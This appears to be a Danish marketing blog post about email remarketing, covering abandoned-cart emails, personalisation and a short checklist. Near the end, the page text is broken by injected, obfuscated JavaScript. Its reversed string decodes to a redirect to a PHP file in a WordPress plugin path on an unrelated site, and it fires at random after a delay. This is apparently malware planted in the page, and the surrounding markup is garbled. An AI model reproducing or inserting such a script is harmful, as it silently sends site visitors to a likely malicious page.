Al erfaring inden for salg viser, at et salg sjældent sker ved første kontakt med kunden. Medmindre kunden på forhånd har besluttet sig for at købe, så kan det tage indtil flere kontakter at få solgt. Det ved enhver sælger, og det er stort set gældende, uanset hvilken vare eller serviceydelse, der skal afsættes.
Og omvendt…
Hvor mange gange har du ikke selv stået i en butik, prøvet en lækker trøje, og lige inden du gik op til kassen for at betale, så har du skiftet mening og i stedet forladt butikken tomhændet? Det sker utallige gange dagligt landet over. En butiksassistent vil højst sandsynligt ikke løbe efter dig og forsøge at overbevise dig om at komme tilbage til butikken for at købe trøjen.
Handler du på nettet? Så er det noget helt andet. Her bør butikken kontakte dig straks – i håb om at bringe dig tilbage til hjemmesiden. Og hér kommer din e-mail remarketing på banen.
[us_separator]
E-mail marketing vs. e-mail remarketing
Mange marketingfolk ved, at når det kommer til e-mail marketing vs. e-mail remarketing, så er udfordringen ikke nødvendigvis, hvor meget det koster at få kunden. Al erfaring viser, at det koster markant flere ressourcer at skaffe en ny kunde frem for at servicere og mer-sælge til en eksisterende. Den virkelige udfordring er med andre ord, hvordan man kan øge kundeværdien og generere mersalg hos de eksisterende kunder, – og hér kan identificeres den største forskel imellem e-mail marketing og e-mail remarketing. Men hvad er så forskellen?
Hvad er e-mail marketing?
Meget forenklet er e-mail marketing typisk en bred og ofte upersonlig kommunikationsform, der skal formidle nogle marketingbudskaber via e-mail. Selvfølgelig kan ordentligt udført e-mail marketing vende op og ned på din marketing og forretning, men meget ofte ender e-mail marketing desværre som en virksomheds ’one-size-fits-all’-nyhedsbrev – bestående af marketingbudskaber udsendt direkte til eksisterende kunder og/eller potentielle kunder, der selv aktivt har tilmeldt sig.
Grundlæggende e-mail marketing kan for de fleste være et vigtigt redskab i markedsføringen – uanset hvad der sælges. Via nyhedsbreve kan der effektivt kommunikeres til en målgruppe, og oftest også uden at marketingbudgettet sprænges. Der findes mange muligheder med nyhedsbreve, og der er også flere betydningsfulde faktorer, der kan påvirke dine nyhedsbreves succes. F.eks. mere personlig, direkte kommunikation – baseret på modtageren.
E-mail remarketing
Lad os bare kalde e-mail remarketing for den raffinerede storebror til e-mail marketing. Idéen med e-mail remarketing er at trække kunder eller brugere tilbage på din hjemmeside.
Du kender jo allerede dine kunder og har allerede brugt ressourcer, tid og penge på, at disse personer besøger din hjemmeside. Med e-mail remarketing bruger du din viden og oplysninger om kunderne – til at sende 1-til-1-relevante e-mails. Det er jo let nok (i teorien), men hvad ved du om dine kunder?
Det, du har brug for at vide for at kunne udsende remarketing e-mails, er dine kunders e-mailadresser samt relevant data om, hvordan kunderne hver især agerer online, deres købshistorik, interesser osv. Derefter kan dine remarketing e-mails teknisk set opsættes og udsendes helt automatisk.
[us_separator]
Hvilken slags remarketing e-mails kunne du udsende?
Den mest kendte form for remarketing e-mails er muligvis opfølgningen på en ”forladt indkøbsvogn” i forbindelse med online-salg. Rigtig mange kunder forlader af forskellige årsager deres online-indkøbskurv, før de afslutter et køb. Med andre ord er der her tale om personer, der NÆSTEN har købt noget hos dig. Måske skal der ikke andet end en høflig påmindelse pr. e-mail fra din side til, at de får trykket på ”Køb”-knappen – eller måske er det en e-mail med en personlig rabatkode, der kan udløse købet.
Der er dog også masser af andre eksempler på remarketing e-mails, f.eks.:
• Opfølgnings e-mails på tidligere salg, tilmeldinger, deltagelser i kurser osv.
• Opdaterings e-mails vedr. status i kundeklub/point/loyalitets-programmer
• Opfølgnings e-mails til kunder, der har været inaktive i en periode
Hvordan kan remarketing e-mails øge dit salg?
En klog afsender vil altid sende e-mails med indhold baseret på kunders tidligere køb; kundens adfærd på hjemmesiden osv., da det således er det muligt at sende en relevant og personligt tilpasset e-mail til modtageren. Relevans i kombination med personlig tilpasning er et nøgleudtryk i forbindelse med remarketing, da det er netop er denne, der får dine modtagere til at åbne dine e-mails – og senere klikke og købe.
Vi kan alle genkende, at vi helt naturligt er interesserede i at åbne og læse e-mails, der er sendt af ”nogen, vi kender”, venner og familie, da vi opfatter indholdet i disse som åbenlyst relevant for os. På samme måde fungerer det med e-mails sendt fra en virksomhed: Hvis indholdet i e-mailen er gjort personligt og skabt med udgangspunkt i vores konkrete tidligere kontakt med virksomheden, så opfatter vi den som relevant for netop os – og har dermed langt større tilbøjelighed til at åbne mailen og reagere på indholdet.
[us_separator]
Kort sagt:
Relevante og personligt tilpassede e-mails vil blive åbnet af modtagerne, – de vil blive klikket på, og de vil føre til salg.
Din tjekliste til e-mail remarketing:
Enkelhed:
Hold din e-mail helt simpel – short & sweet! Der er ingen, som gider læse lange e-mails, så opnå og fasthold din kundes opmærksomhed med en enkel og kort e-mail.
Kom hurtigt til sagen:
Lav din call-to-action klar og iøjnefaldende – jo mindre scrolling, din e-mail kræver, desto bedre. En remarketing e-mails opgave skal være knivskarpt defineret.
Skab incitament:
Alle elsker et godt tilbud, en kupon eller gratis levering. Vær kreativ!
– Rigtig god fornøjelse med dine remarketing-aktiviteter!
”Jeg
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom” text_color=”#ffffff” title_tag=”h3″ controls=”bottom” btn_link=”url:http%3A%2F%2Fwww.globase.dk%2Fkontakt|||” btn_label=”Kontakt Globase nu!” btn_style=”outlined” btn_color=”white” btn_size=”18px”]Lad os vise jer potentialet ud fra konkrete eksempler i andre virksomheder lige som jeres.
I forpligter jer ikke til noget som helst – andet end at sætte en kop kaffe på kanden.